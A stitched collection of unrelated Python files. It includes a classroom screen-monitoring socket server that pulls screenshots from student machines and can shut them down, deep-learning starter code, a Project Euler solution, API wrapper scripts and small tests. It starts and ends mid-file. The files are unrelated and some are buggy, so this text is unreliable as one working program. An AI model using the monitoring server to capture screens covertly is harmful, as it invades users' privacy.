mesh.cell_data['tetra']['min_dev'] = min_dev
mesh.cell_data['tetra']['avg_dev'] = avg_dev
meshio.write(PATH+'test.vtk', mesh) |
from threading import Thread, Lock
import socket
import os
import time
import shutil
clients = []
addrs = []
isStudent = []
keyset = "`~"
colors = ["Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua"]
lock = Lock()
flag = 0
def createFolders():
for i in range(20):
clientfolder = "static/img/comp"+str(i+1)
if not os.path.exists(clientfolder):
os.makedirs(clientfolder)
static_img = "static/img/comp"+str(i+1)+"/0.png"
if os.path.exists(static_img):
onlyfiles = len(next(os.walk(clientfolder))[2])
new_img = "static/img/comp"+str(i+1)+"/"+str(onlyfiles)+".png"
os.rename(static_img,new_img)
shutil.copyfile("static/blank.png",static_img)
def emptyFolders():
global flag
while flag==1:
time.sleep(0.2)
flag = 1
for i in range(20):
clientfolder = "static/img/comp"+str(i+1)
for file in os.listdir(clientfolder):
file_path = os.path.join(clientfolder, file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
except Exception as e:
print(e)
static_img = clientfolder+"/0.png"
shutil.copyfile("static/blank.png",static_img)
flag = 0
def acceptClients(s):
global clients,isStudent,keyset
global addrs
while True:
ind = -1
c, addr = s.accept()
addr = str(addr)
only_ip = addr.split(',')
for add in addrs:
compare_ip = add.split(',')
if compare_ip[0] == only_ip[0]:
ind = addrs.index(add)
break
if ind != -1:
clients[ind] = c
addrs[ind] = addr
isStudent[ind] = True
else:
clients.append(c)
addrs.append(addr)
isStudent.append(True)
print("Client IP: <"+ addr+"> connected successfully !!");
sendkeywords(c, keyset)
def sessionkey(string):
global keyset
keyset = string
def reqSS(c):
global clients,addrs,colors,flag
while flag==1:
time.sleep(0.2)
flag = 1
try:
c.send(str.encode("BHEJO"))
print(1)
data = c.recv(1024)
datastr = data.decode("UTF-8")
if datastr[:6] == "EXISTS":
filesize = int(datastr[6:])
print(filesize)
message = 'Y' #input("File exists, " + str(filesize) + "Bytes, download? (Y/N)? -> ")
if message == 'Y':
c.send(str.encode("OK"))
clientfolder = "static/img/comp"+str(clients.index(c)+1)
static_img = "static/img/comp"+str(clients.index(c)+1)+"/0.png"
onlyfiles = len(next(os.walk(clientfolder))[2])
new_img = "static/img/comp"+str(clients.index(c)+1)+"/"+str(onlyfiles)+".png"
newfile = "static/img/comp"+str(clients.index(c)+1)+"/temp.png"
f = open(newfile, 'wb')
data = c.recv(1024)
totalRecv = len(data)
f.write(data)
while totalRecv < filesize:
data = c.recv(1024)
totalRecv += len(data)
f.write(data)
print("{0:.2f}".format((totalRecv / float(filesize)) * 100) + "% Done")
f.close()
print("Download Complete!")
print(onlyfiles)
os.rename(static_img,new_img)
os.rename(newfile,static_img)
else:
print("File Does Not Exist!")
except:
print('sock error')
flag = 0
def sendmessage(c,msg):
try:
global clients,addrs,colors,flag
while flag==1:
time.sleep(0.2)
flag = 1
c.send(str.encode("MESSAGE"))
ack = c.recv(1024)
if ack == b"OK":
c.send(str.encode(str(msg)))
print('on the way')
flag = 0
except:
print("sock error")
def disconn(addr):
global clients,addrs,colors,flag,isStudent
while flag==1:
time.sleep(0.2)
flag = 1
if addr in addrs:
ind = addrs.index(addr)
if isStudent[ind]:
isStudent[ind] = False
clientfolder = "static/img/comp"+str(ind+1)
static_img = "static/img/comp"+str(ind+1)+"/0.png"
if os.path.exists(static_img):
onlyfiles = len(next(os.walk(clientfolder))[2])
new_img = "static/img/comp"+str(ind+1)+"/"+str(onlyfiles)+".png"
os.rename(static_img,new_img)
shutil.copyfile("static/blank.png",static_img)
else:
isStudent[ind] = True
flag = 0
def shutdown(c):
try:
global clients,addrs,colors,flag
while flag==1:
time.sleep(0.2)
flag = 1
c.send(str.encode("SHUTDOWN"))
flag = 0
except:
print("sock error")
def sendkeywords(c,string2):
try:
global clients,addrs,colors,flag
while flag==1:
time.sleep(0.2)
flag = 1
c.send(str.encode("KEYWORDS"))
ack = c.recv(1024)
if ack == b"OK":
c.send(str.encode(str(string2)))
print('on the way')
flag = 0
except:
print("sock error")
def Main():
global clients,isStudent
global addrs
str = open('server_ip.txt', 'r').read()
print(str)
host = str
port = 2224
try:
s = socket.socket()
s.bind((host,port))
s.listen(5)
print("Server Started!!")
Thread(target = acceptClients, args = (s,)).start()
while True:
print(clients)
print(addrs)
for c in clients:
ind = clients.index(c)
if isStudent[ind]:
reqSS(c)
time.sleep(1)
time.sleep(10)
except:
print("Some jhol")
finally:
s.close()
|
def settingDicts():
""" This dicts is used to make settings form"""
dicts = [
{
"id": 1,
"name": "Bot User OAuth Access Token",
"isEncrypted": False,
"properties": {
"rules": [
{
"required": False,
"message": ""
}
],
"type": "text",
}
},
{
"id": 2,
"name": "Slack Channel ID for Anomaly Alerts",
"isEncrypted": False,
"properties": {
"rules": [
{
"required": False,
"message": ""
}
],
"type": "text",
}
},
{
"id": 3,
"name": "Slack Channel ID for App Monitoring",
"isEncrypted": False,
"properties": {
"rules": [
{
"required": False,
"message": ""
}
],
"type": "text",
}
},
{
"id": 4,
"name": "Send Email To",
"isEncrypted": False,
"properties": {
"rules": [
{
"required": False,
"message": ""
}
],
"type": "textarea",
}
}
]
return dicts |
# from distutils.core import setup
from setuptools import setup
setup(
name='socksproxy',
version='1.0.0',
packages=['socksproxy'],
url='https://github.com/UltrafunkAmsterdam/socksproxy',
license='MIT',
author='UltrafunkAmsterdam',
author_email='info@ultrafunk.nl',
description='A flexible, asynchronous SOCKS 4/4A/5/5H proxy server written in pure Python',
entry_points = {
'console_scripts': ['socksproxy = socksproxy.__main__:main'],
}
)
|
import time
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import ElementNotVisibleException, ElementNotSelectableException, \
NoSuchElementException, InvalidElementStateException
from selenium.webdriver import ActionChains
from selenium.webdriver.support.wait import WebDriverWait
desired_caps = {}
desired_caps['platformName'] = 'Android'
desired_caps['platformVersion'] = '5.1.1'
desired_caps['deviceName'] = 'Arya'
desired_caps['app'] = ('G:/Appium/sbadmin.apk')
desired_caps['appPackage'] = 'com.nxtk.warehousemanagement'
desired_caps['appActivity'] = 'com.nxtk.warehousemanagement.MainActivity'
driver = webdriver.Remote("http://127.0.0.1:4723/wd/hub", desired_caps)
time.sleep(1)
wait = WebDriverWait(driver,25,poll_frequency=1,ignored_exceptions=[ElementNotVisibleException,ElementNotSelectableException,NoSuchElementException,InvalidElementStateException])
time.sleep(1)
driver.find_element_by_android_uiautomator("UiSelector().index(1)").click()
time.sleep(5)
driver.quit() |
#!/usr/bin/env python
"""
CMSC733 Spring 2019: Classical and Deep Learning Approaches for
Geometric Computer Vision
Project 1: MyAutoPano: Phase 2 Starter Code
Author(s):
Nitin J. Sanket (nitinsan@terpmail.umd.edu)
PhD Candidate in Computer Science,
University of Maryland, College Park
"""
# Dependencies:
# opencv, do (pip install opencv-python)
# skimage, do (apt install python-skimage)
# termcolor, do (pip install termcolor)
from __future__ import print_function
import tensorflow as tf
import cv2
import sys
import os
import glob
#import Misc.ImageUtils as iu
import random
from skimage import data, exposure, img_as_float
import matplotlib.pyplot as plt
from Network.Network import HomographyModel
from Misc.MiscUtils import *
from Misc.DataUtils import SetupAll
from Misc.DataUtils import ReadLabels
from Misc.DataUtils import SetupDirNames
from Misc.DataUtils import ReadDirNames
from Misc.utils import *
import numpy as np
import time
import argparse
import shutil
from StringIO import StringIO
import string
from termcolor import colored, cprint
import math as m
from tqdm import tqdm
from Misc.TFSpatialTransformer import *
# Don't generate pyc codes
sys.dont_write_bytecode = True
def GenerateBatch(BasePath, DirNamesTrain, TrainLabels, ImageSize, MiniBatchSize):
"""
Inputs:
BasePath - Path to COCO folder without "/" at the end
DirNamesTrain - Variable with Subfolder paths to train files
NOTE that Train can be replaced by Val/Test for generating batch corresponding to validation (held-out testing in this case)/testing
TrainLabels - Labels corresponding to Train
NOTE that TrainLabels can be replaced by Val/TestLabels for generating batch corresponding to validation (held-out testing in this case)/testing
ImageSize - Size of the Image
MiniBatchSize is the size of the MiniBatch
Outputs:
I1Batch - Batch of images
LabelBatch - Batch of one-hot encoded labels
"""
I1Batch = []
LabelBatch = []
ImageNum = 0
while ImageNum < MiniBatchSize:
# Generate random image
RandIdx = random.randint(0, len(DirNamesTrain)-1)
#print(type(BasePath))
#print(type(DirNames))
#RandImageName = BasePath + os.sep + DirNamesTrain[RandIdx] # + '.jpg'
ImageNum += 1
print("reading random image : ",ImageNum,'\n')
##########################################################
# Add any standardization or data augmentation here!
##########################################################
I1 = np.float32((DirNamesTrain[RandIdx]))
Label = convertToOneHot(TrainLabels[RandIdx], 10)
print("Image Shape = ",I1.shape)
# Append All Images and Mask
I1Batch.append(I1)
LabelBatch.append(Label)
print("I1Batch Shape: ", len(I1Batch))
print("LabelBatch Shape: ", len(LabelBatch))
return I1Batch, LabelBatch
def PrettyPrint(NumEpochs, DivTrain, MiniBatchSize, NumTrainSamples, LatestFile):
"""
Prints all stats with all arguments
"""
print('Number of Epochs Training will run for ' + str(NumEpochs))
print('Factor of reduction in training data is ' + str(DivTrain))
print('Mini Batch Size ' + str(MiniBatchSize))
print('Number of Training Images ' + str(NumTrainSamples))
if LatestFile is not None:
print('Loading latest checkpoint with the name ' + LatestFile)
def TrainOperation(ImgPH, LabelPH, DirNamesTrain, TrainLabels, NumTrainSamples, ImageSize,
NumEpochs, MiniBatchSize, SaveCheckPoint, CheckPointPath,
DivTrain, LatestFile, BasePath, LogsPath, ModelType):
"""
Inputs:
ImgPH is the Input Image placeholder
LabelPH is the one-hot encoded label placeholder
DirNamesTrain - Variable with Subfolder paths to train files
TrainLabels - Labels corresponding to Train/Test
NumTrainSamples - length(Train)
ImageSize - Size of the image
NumEpochs - Number of passes through the Train data
MiniBatchSize is the size of the MiniBatch
SaveCheckPoint - Save checkpoint every SaveCheckPoint iteration in every epoch, checkpoint saved automatically after every epoch
CheckPointPath - Path to save checkpoints/model
DivTrain - Divide the data by this number for Epoch calculation, use if you have a lot of dataor for debugging code
LatestFile - Latest checkpointfile to continue training
BasePath - Path to COCO folder without "/" at the end
LogsPath - Path to save Tensorboard Logs
ModelType - Supervised or Unsupervised Model
Outputs:
Saves Trained network in CheckPointPath and Logs to LogsPath
"""
# keep_prob for dropout
keep_prob = 0.5
# print('Image PH',ImgPH.shape)
# Predict output with forward pass
prLogits = HomographyModel(ImgPH, ImageSize, MiniBatchSize,keep_prob)
# sess1 = tf.Session()
# print("size of prLogits: ")
# print1 = tf.Print(prLogits,[prLogits])
# print("size of LabelPH", tf.Print(LabelPH))
# sess1 = tf.Session()
# with sess1.as_default():
# tensor = tf.range(10)
# print_op = tf.print(tensor)
# with tf.control_dependencies([print_op]):
# out = tf.add(tensor, tensor)
# sess1.run(out)
# sess1.close()
with tf.name_scope('Loss'):
print("\nCalculating L2 Loss")
###############################################
# Fill your loss function of choice here!
###############################################
# loss = tf.reduce_sum(tf.square(tf.subtract(prLogits, TrainLabels))) / 2
loss = tf.square(prLogits - LabelPH)
# len_x = tf.sqrt(tf.reduce_sum(tf.square(prLogits)))
# len_y = tf.sqrt(tf.reduce_sum(tf.square(LabelPH)))
# loss = tf.sqrt(tf.reduce_sum(tf.square(prLogits/len_x - LabelPH/len_y)))
print("Loss Calcuation Done!!")
print("loss = ", loss)
# fc2 = network output
# x2 = true label
with tf.name_scope('Adam'):
###############################################
# Fill your optimizer of choice here!
###############################################
Optimizer = tf.train.MomentumOptimizer(learning_rate=0.01, momentum=0.9).minimize(loss)
# Tensorboard
# Create a summary to monitor loss tensor
tf.summary.scalar('LossEveryIter', loss)
# tf.summary.image('Anything you want', AnyImg)
# Merge all summaries into a single operation
MergedSummaryOP = tf.summary.merge_all()
# Setup Saver
Saver = tf.train.Saver()
with tf.Session() as sess:
if LatestFile is not None:
Saver.restore(sess, CheckPointPath + LatestFile + '.ckpt')
# Extract only numbers from the name
StartEpoch = int(''.join(c for c in LatestFile.split('a')[0] if c.isdigit()))
print('Loaded latest checkpoint with the name ' + LatestFile + '....')
else:
sess.run(tf.global_variables_initializer())
StartEpoch = 0
print('New model initialized....')
# Tensorboard
Writer = tf.summary.FileWriter(LogsPath, graph=tf.get_default_graph())
for Epochs in tqdm(range(StartEpoch, NumEpochs)):
NumIterationsPerEpoch = int(NumTrainSamples/MiniBatchSize/DivTrain)
for PerEpochCounter in tqdm(range(NumIterationsPerEpoch)):
I1Batch, LabelBatch = GenerateBatch(BasePath, DirNamesTrain, TrainLabels, ImageSize, MiniBatchSize)
FeedDict = {ImgPH: I1Batch, LabelPH: LabelBatch}
print("FeedDict = ",FeedDict)
#print("Optimizer = ",tf.shape(Optimizer))
print("loss = ",loss)
#print("MergedSummaryOP",type(MergedSummaryOP))
# _, LossThisBatch, Summary = sess.run([Optimizer, loss, MergedSummaryOP], feed_dict=FeedDict)
_, LossThisBatch, Summary = sess.run(Optimizer, feed_dict=FeedDict)
# Save checkpoint every some SaveCheckPoint's iterations
if PerEpochCounter % SaveCheckPoint == 0:
# Save the Model learnt in this epoch
SaveName = CheckPointPath + str(Epochs) + 'a' + str(PerEpochCounter) + 'model.ckpt'
Saver.save(sess, save_path=SaveName)
print('\n' + SaveName + ' Model Saved...')
# Tensorboard
Writer.add_summary(Summary, Epochs*NumIterationsPerEpoch + PerEpochCounter)
# If you don't flush the tensorboard doesn't update until a lot of iterations!
Writer.flush()
# Save model every epoch
SaveName = CheckPointPath + str(Epochs) + 'model.ckpt'
Saver.save(sess, save_path=SaveName)
print('\n' + SaveName + ' Model Saved...')
def main():
"""
Inputs:
None
Outputs:
Runs the Training and testing code based on the Flag
"""
# Parse Command Line arguments
Parser = argparse.ArgumentParser()
Parser.add_argument('--BasePath', default='../Data/Stacked', help='Base path of images, Default:/media/nitin/Research/Homing/SpectralCompression/COCO')
Parser.add_argument('--CheckPointPath', default='../Checkpoints/', help='Path to save Checkpoints, Default: ../Checkpoints/')
Parser.add_argument('--ModelType', default='Sup', help='Model type, Supervised or Unsupervised? Choose from Sup and Unsup, Default:Sup')
Parser.add_argument('--NumEpochs', type=int, default=50, help='Number of Epochs to Train for, Default:50')
Parser.add_argument('--DivTrain', type=int, default=1, help='Factor to reduce Train data by per epoch, Default:1')
Parser.add_argument('--MiniBatchSize', type=int, default=1, help='Size of the MiniBatch to use, Default:1')
Parser.add_argument('--LoadCheckPoint', type=int, default=0, help='Load Model from latest Checkpoint from CheckPointsPath?, Default:0')
Parser.add_argument('--LogsPath', default='../Logs/', help='Path to save Logs for Tensorboard, Default=../Logs/')
Args = Parser.parse_args()
NumEpochs = Args.NumEpochs
BasePath = Args.BasePath
DivTrain = float(Args.DivTrain)
MiniBatchSize = Args.MiniBatchSize
LoadCheckPoint = Args.LoadCheckPoint
CheckPointPath = Args.CheckPointPath
LogsPath = Args.LogsPath
ModelType = Args.ModelType
# Setup all needed parameters including file reading
DirNamesTrain, SaveCheckPoint, ImageSize, NumTrainSamples, TrainLabels, NumClasses = SetupAll(BasePath, CheckPointPath)
# Find Latest Checkpoint File
if LoadCheckPoint==1:
LatestFile = FindLatestModel(CheckPointPath)
else:
LatestFile = None
# Pretty print stats
PrettyPrint(NumEpochs, DivTrain, MiniBatchSize, NumTrainSamples, LatestFile)
# Define PlaceHolder variables for Input and Predicted output
ImgPH = tf.placeholder(tf.float32, shape=(MiniBatchSize, ImageSize[0], ImageSize[1], ImageSize[2]))
LabelPH = tf.placeholder(tf.float32, shape=(MiniBatchSize,NumClasses)) # OneHOT labels
TrainOperation(ImgPH, LabelPH, DirNamesTrain, TrainLabels, NumTrainSamples, ImageSize,
NumEpochs, MiniBatchSize, SaveCheckPoint, CheckPointPath,
DivTrain, LatestFile, BasePath, LogsPath, ModelType)
if __name__ == '__main__':
main()
|
'''
a -> aRbFR
b -> LFaLb
Some setup stuff to play around with the problem, then the actual solution. Runs very quickly--didn't even bother memoizing it, though this
would help for larger input.
'''
def D(n):
if n == 0:
return 'Fa'
else:
return D(n-1).replace('a', 'aRcFR').replace('b', 'LFaLb').replace('c', 'b')
class Dragon:
def __init__(self, max_num_forwards = -1):
self.x_dir = 0
self.y_dir = 1
self.x_pos = 0
self.y_pos = 0
self.max_num_forwards = max_num_forwards
self.num_forwards = 0
def consume_character(self, character):
if self.num_forwards != self.max_num_forwards:
if character == 'F':
self.num_forwards += 1
self.x_pos += self.x_dir
self.y_pos += self.y_dir
elif character == 'R':
self.x_dir, self.y_dir = self.y_dir, -self.x_dir
elif character == 'L':
self.x_dir, self.y_dir = -self.y_dir, self.x_dir
def consume_string(self, string):
for character in string:
self.consume_character(character)
def get_last_position(n):
instructions = D(n)
dragon = Dragon()
dragon.consume_string(instructions)
print dragon.num_forwards
return (dragon.x_pos, dragon.y_pos)
print [get_last_position(i) for i in range(10)]
'''
Initial few end positions are:
(0, 1)
(1, 1)
(2, 0)
(2, -2)
(0, -4)
(-4, -4)
(-8, 0)
... and so on
spirals outward at theta = -45 degrees and radius sqrt(2)
so end position for k in the complex plane is
z_k = i * (sqrt(2) cis(-i pi/4))^k
= i * (sqrt(2) * (1/sqrt(2) - i/sqrt(2)))^n
= i * (1 - i)^n
let a_k = re(z_k), b_k = im(z_k)
then a_0 = 0, b_0 = 1
z_n = (1 - i)(a_{n-1} + b_{n-1} i)
= a_{n-1} + b_{n-1} + (b_{n-1} - a_{n-1}) i
so a_n = a_{n-1} + b_{n-1} and b_n = b_{n-1} - a_{n-1}
'''
def end_position(k):
if k == 0:
return (0, 1)
else:
a, b = end_position(k - 1)
return (a + b, b - a)
def position_after_n_steps_in_Dk(n, k):
if k == 0:
if n == 0:
return (0, 0)
assert n == 1
return (0, 1)
else:
if n <= pow(2, k - 1):
return position_after_n_steps_in_Dk(n, k - 1)
else:
x_first, y_first = end_position(k - 1)
# Now get the offset from the end and rotate it.
x_recursive, y_recursive = position_after_n_steps_in_Dk(pow(2, k) - n, k - 1)
x_recursive -= x_first
y_recursive -= y_first
# Now we need to rotate the backward steps and add it to the initial steps.
return (x_first - y_recursive, y_first + x_recursive)
print position_after_n_steps_in_Dk(10**12, 50)
# print position_after_n_steps_in_Dk(3, 3)
# print [position_after_n_steps_in_Dk(i, 4) for i in range(16)]
|
# coding=utf-8
import os
import configparser
prjDir = os.path.split(os.path.realpath(__file__))[0]
configfile_path = os.path.join(prjDir, "config.ini") # 获取config配置文件所在路径
class Readconfig:
def __init__(self):
self.conf = configparser.ConfigParser()
self.conf.read(configfile_path)
def getAppValue(self, name):
"""
name:'app'下面参数对应的值
"""
value = self.conf.get('app', name)
return value
def getcmdValue(self, name):
"""
name:'cmd'下面参数对应的值
"""
value = self.conf.get('cmd', name)
return value
def getemailValue(self, name):
"""
name:'email'下面参数对应的值
"""
value = self.conf.get('email', name)
return value
if __name__ == '__main__':
read = Readconfig()
platformname = read.getAppValue('platformName')
print(platformname)
apppackage = read.getAppValue('appPackage')
print(apppackage)
values = os.popen(read.getcmdValue('viewPhone')).readlines()
#print(values)
for i in range(len(values)-1):
print(values[i])
#print(values[1].split()[0])
|
x = 50
def test1():
global x
x = 40
def test2():
print(x)
test1()
test2()
#Pull from Master/develop to update local master/develop
#Go to your branch and rebase with master/develop
#This should pull the latest and greatest into your branch
#this is what you should do.
#added new develop branch crap
#trying out rebase 123 changings! feature!
|
import requests
import json
r = requests.get("http://localhost:8080/deleteQuery/sleepProfileQuery")
print r.text
mainLogic = """
inadequateSleep.
"""
queryInput = { "predicates" : [] }
queryOutput = {
"predicates" : []
}
devices = [
]
knowledgeDependencies = {"externalServices": [],
"queries": []
}
queryDefinition = {}
queryDefinition["queryName"] = "sleepProfileQuery"
queryDefinition["mainLogic"] = mainLogic
queryDefinition["inputDefinition"] = queryInput
queryDefinition["outputDefinition"] = queryOutput
queryDefinition["devicesUsed"] = devices
queryDefinition["knowledgeDependencies"] = knowledgeDependencies
queryDefinition["queryDescription"] = "Retrieve a user's sleep profile knowledge"
print queryDefinition
r = requests.post("http://localhost:8080/addQuery", json=queryDefinition)
print json.dumps(r.text, indent=4)
|
import re
regS = '\#(.\n)*'
txt = '''# \t # ? | string a = "ayush \n agarwal"; '''
print(re.fullmatch(regS,txt))
# txt = '# ayush'
# if(re.search(regS,txt)):
# print("matched")
# else:
# print("notMatched")
# import re
# txt = "The rain in Spain"
# x = re.fullmatch("The rai in Spain", txt)
# print(x) |
# -*- coding: utf-8
# Models
from ..models import Channel, ChannelUser, Message
async def test_channel_model(channel_data):
channel = Channel(
owner_id=1,
name='General')
channel = await channel.create()
assert repr(channel) == "<Channel: 'General'>"
async def test_channel_user_model(channel_data):
channel_user = ChannelUser(
user_id=1,
channel_id=1)
channel_user = await channel_user.create()
assert repr(channel_user) == "<ChannelUser: 1 1>"
async def test_message_model(message_data):
message = Message(
author_id=1,
channel_id=1,
content='General')
message = await message.create()
assert repr(message) == "<Message: {}>".format(message.id)
|
import json
import quizlet_api_wrapper
class QuizletApiUtilities:
def get_new_set_id(json_string):
# fetches set_id from json response of create_new_set() method from Quizlet API
datastore = json.loads(json_string)
return datastore['set_id']
def get_new_term_id(json_string):
# fetches term_id from json response of add_single_term() method from Quizlet API
datastore = json.loads(json_string)
return datastore['id']
class UsingQuizletApiWrapper:
qz_api_instance = quizlet_api_wrapper.QuizletApiClass()
# read necessary credentials from private_creds.json
qz_api_instance.read_creds()
# get read and write access tokens
qz_api_instance.fetch_read_write_access_token_from_cache()
# create new set
list_of_definition = [('term1', 'def1'), ('term2', 'def2'), ('term3', 'def3')]
new_set_json_string = qz_api_instance.create_new_set(term_def_list=list_of_definition)
print(new_set_json_string)
new_set_id = QuizletApiUtilities.get_new_set_id(new_set_json_string) # fetch new set_id from json response
# fetch terms from set
print(qz_api_instance.fetch_terms_from_a_set(new_set_id))
# fetch terms along with additional details from a set
print(qz_api_instance.fetch_all_details_from_a_set(new_set_id))
# add a new term to a set
new_term_json_string = qz_api_instance.add_single_term(set_id=new_set_id, term='term4', definition='definition4')
new_term_id = QuizletApiUtilities.get_new_term_id(new_term_json_string) # get term_id of a new term added
print(new_term_id)
# edit a single term
print(qz_api_instance.edit_single_term(set_id=new_set_id, term_id=str(new_term_id)))
# delete a single term from a set
print(qz_api_instance.delete_single_term(set_id=new_set_id, term_id=new_term_id)) # first create a term to delete
# fetch minimal details of a user
print(qz_api_instance.fetch_minimal_user_details(qz_api_instance.USERNAME))
# delete whole set
print(qz_api_instance.delete_set(new_set_id))
# print(x.edit_whole_set(set_id=299289740, title='My second set via api', term_def_list=list_of_definition ))
|
import json
import web3
from web3 import Web3
from contracts.packer import *
address_deployed_contract = '0xbDaAe5285BEE72Ac7DEfaD987A8d67C36cde612f'
def getw3():
#target = 'http://172.13.0.2:8545'
target = 'http://127.0.0.1:8545'
aprovider = Web3.HTTPProvider(target)
w3 = Web3(aprovider)
assert w3.isConnected(), 'node not connected at {}'.format(target)
return w3
def getPacker():
w3 = getw3()
packer = Packer(w3, 'SimpleCounter', 'contracts/simplecounter.sol')
return (w3, packer)
def deployibit():
w3, packer = getPacker()
deployed = packer.deploy_now(w3.eth.accounts[0])
#reader = packer.get_concise_instance(deployed)
print('11 [{}]'.format(deployed.functions.getBalance().call()))
# print('12 [{}]'.format(reader.getBalance()))
def checkibit():
w3, packer = getPacker()
deployed = packer.from_deployed_instance(address_deployed_contract)
reader = packer.get_concise_instance(address_deployed_contract)
print('61 [{}]'.format(deployed.functions.getBalance().call()))
print('62 [{}]'.format(reader.getBalance()))
def updateibit(params):
w3, packer = getPacker()
deployed = packer.from_deployed_instance(address_deployed_contract)
reader = packer.get_concise_instance(address_deployed_contract)
# params = (3200,)
# print('params:', params)
# packer.update_function(deployed, 'createNote', params[0], params[1])
w3.eth.defaultAccount = w3.eth.accounts[0]
txhash = deployed.functions.update(params[0])
txhash = txhash.transact()
w3.eth.waitForTransactionReceipt(txhash)
print('81 [{}]'.format(deployed.functions.getBalance().call()))
print('82 [{}]'.format(reader.getBalance()))
#deployibit()
checkibit()
updateibit( (323,) )
|
from media import Movie
def generate_movies(codes):
"""Takes a dictionary of IMDB movie codes, generates their associated movie
objects and generates the Fresh Tomatoes site with that data.
Args:
codes (dict): A dictionary of codes with the following format
"Movie Name": "imdb_code",
"The Martian": "tt3659388"
Returns:
A list of movie objects
"""
movies = []
for k, v in codes.iteritems():
movies.append(Movie.from_code(v))
return movies
|
#
#Copyright (c) 2018 Jie Zheng
#
import queue
import traceback
from e3net.common.e3keeper import root_keeper
from pysyncobj import SyncObj
from pysyncobj import SyncObjConf
from pysyncobj import replicated
from e3net.common.e3rwlock import e3rwlock
from e3net.common.e3log import get_e3loger
from e3net.common.e3config import get_config
from e3net.common.e3exception import e3_exception
from e3net.common.e3exception import E3_EXCEPTION_IN_USE
from e3net.common.e3exception import E3_EXCEPTION_NOT_FOUND
from e3net.common.e3exception import E3_EXCEPTION_INVALID_ARGUMENT
from e3net.common.e3exception import E3_EXCEPTION_OUT_OF_RESOURCE
from e3net.common.e3exception import E3_EXCEPTION_NOT_SUPPORT
from e3net.common.e3exception import E3_EXCEPTION_BE_PRESENT
from e3net.common.e3exception import E3_EXCEPTION_NOT_SUCCESSFUL
from e3net.common.e3exception import E3_EXCEPTION_NOT_READY
from e3net.db.db_vswitch_host import db_register_e3vswitch_host
from e3net.db.db_vswitch_interface import db_register_e3vswitch_interface
from e3net.db.db_vswitch_lan_zone import db_register_e3vswitch_lanzone
from e3net.db.db_cas_role import db_register_role
from e3net.db.db_cas_tenant import db_register_tenant
from e3net.db.db_cas_token import db_register_token
from e3net.db.db_vswitch_ether_service import db_register_vswitch_ether_service
from e3net.db.db_vswitch_topology import db_register_vswitch_topology_edge
from e3net.db.db_vswitch_ether_service_vlan import db_register_vswitch_ether_service_vlan
dispatching_for_registery = {
'vswitch_host': db_register_e3vswitch_host,
'vswitch_interface': db_register_e3vswitch_interface,
'vswitch_lan_zone': db_register_e3vswitch_lanzone,
'role': db_register_role,
'tenant': db_register_tenant,
'token': db_register_token,
'ether_service': db_register_vswitch_ether_service,
'topology_edge': db_register_vswitch_topology_edge,
'ether_service_vlan': db_register_vswitch_ether_service_vlan
}
from e3net.db.db_vswitch_host import db_update_e3vswitch_host
from e3net.db.db_vswitch_lan_zone import db_update_e3vswitch_lanzone
from e3net.db.db_vswitch_interface import db_update_e3vswitch_interface
from e3net.db.db_cas_role import db_update_role
from e3net.db.db_cas_tenant import db_update_tenant
from e3net.db.db_cas_token import db_update_token
dispatching_for_update = {
'vswitch_host': db_update_e3vswitch_host,
'vswitch_interface': db_update_e3vswitch_interface,
'vswitch_lan_zone': db_update_e3vswitch_lanzone,
'role': db_update_role,
'tenant': db_update_tenant,
'token': db_update_token
}
from e3net.db.db_vswitch_host import db_get_e3vswitch_host
from e3net.db.db_vswitch_interface import db_get_e3vswitch_interface
from e3net.db.db_vswitch_lan_zone import db_get_e3vswitch_lanzone
from e3net.db.db_cas_role import db_get_role
from e3net.db.db_cas_tenant import db_get_tenant
from e3net.db.db_cas_token import db_get_token
from e3net.db.db_vswitch_ether_service import db_get_vswitch_ether_service
from e3net.db.db_vswitch_topology import db_get_vswitch_topology_edge
from e3net.db.db_vswitch_ether_service_vlan import db_get_vswitch_ether_service_vlan
dispatching_for_retrieval = {
'vswitch_host': db_get_e3vswitch_host,
'vswitch_interface': db_get_e3vswitch_interface,
'vswitch_lan_zone': db_get_e3vswitch_lanzone,
'role': db_get_role,
'tenant': db_get_tenant,
'token': db_get_token,
'ether_service': db_get_vswitch_ether_service,
'topology_edge': db_get_vswitch_topology_edge,
'ether_service_vlan': db_get_vswitch_ether_service_vlan
}
from e3net.db.db_vswitch_host import db_unregister_e3vswitch_host
from e3net.db.db_vswitch_interface import db_unregister_e3vswitch_interface
from e3net.db.db_vswitch_lan_zone import db_unregister_e3vswitch_lanzone
from e3net.db.db_cas_role import db_unregister_role
from e3net.db.db_cas_tenant import db_unregister_tenant
from e3net.db.db_cas_token import db_unregister_token
from e3net.db.db_vswitch_ether_service import db_unregiser_vswitch_service
from e3net.db.db_vswitch_topology import db_unregister_vswitch_topology_edge
from e3net.db.db_vswitch_ether_service_vlan import db_unregister_vswitch_ether_service_vlan
dispatching_for_deletion = {
'vswitch_host': db_unregister_e3vswitch_host,
'vswitch_interface': db_unregister_e3vswitch_interface,
'vswitch_lan_zone': db_unregister_e3vswitch_lanzone,
'role': db_unregister_role,
'tenant': db_unregister_tenant,
'token': db_unregister_token,
'ether_service': db_unregiser_vswitch_service,
'topology_edge': db_unregister_vswitch_topology_edge,
'ether_service_vlan': db_unregister_vswitch_ether_service_vlan
}
sub_key_to_args={
'vswitch_host':lambda x:{'uuid':x},
'vswitch_interface':lambda x:{'uuid':x},
'vswitch_lan_zone':lambda x:{'uuid':x},
'role':lambda x:{'uuid':x},
'tenant':lambda x:{'uuid':x},
'token':lambda x:{'uuid':x},
'ether_service':lambda x:{'uuid':x},
'topology_edge':lambda x:{'uuid':x},
'ether_service_vlan':lambda x:{'uuid':x}
}
cluster_conf = {
'cluster': {
'local_address': 'localhost:8333',
'peer_addresses': ''
}
}
_event_queue = queue.Queue()
#
#root_key as the table name
#sub_key as object name
#right here we also implement distributed lock primitive
#
e3loger = get_e3loger('e3vswitch_controller')
class inventory_base(SyncObj):
def __init__(self, selfaddr, otheraddress, conf=None):
#a dictionary which contains tuple <locakpath,expiry-time>
self._locks = dict()
self._lock_native_guard = e3rwlock()
super(inventory_base, self).__init__(selfaddr, otheraddress, conf)
#put an event into the event backlog quuee
@replicated
def notify_event(self, event):
if self._isReady() is True:
_event_queue.put(event)
return True, None
else:
return False, 'sync state not ready'
#
#the raw subjec manipulation
#
@replicated
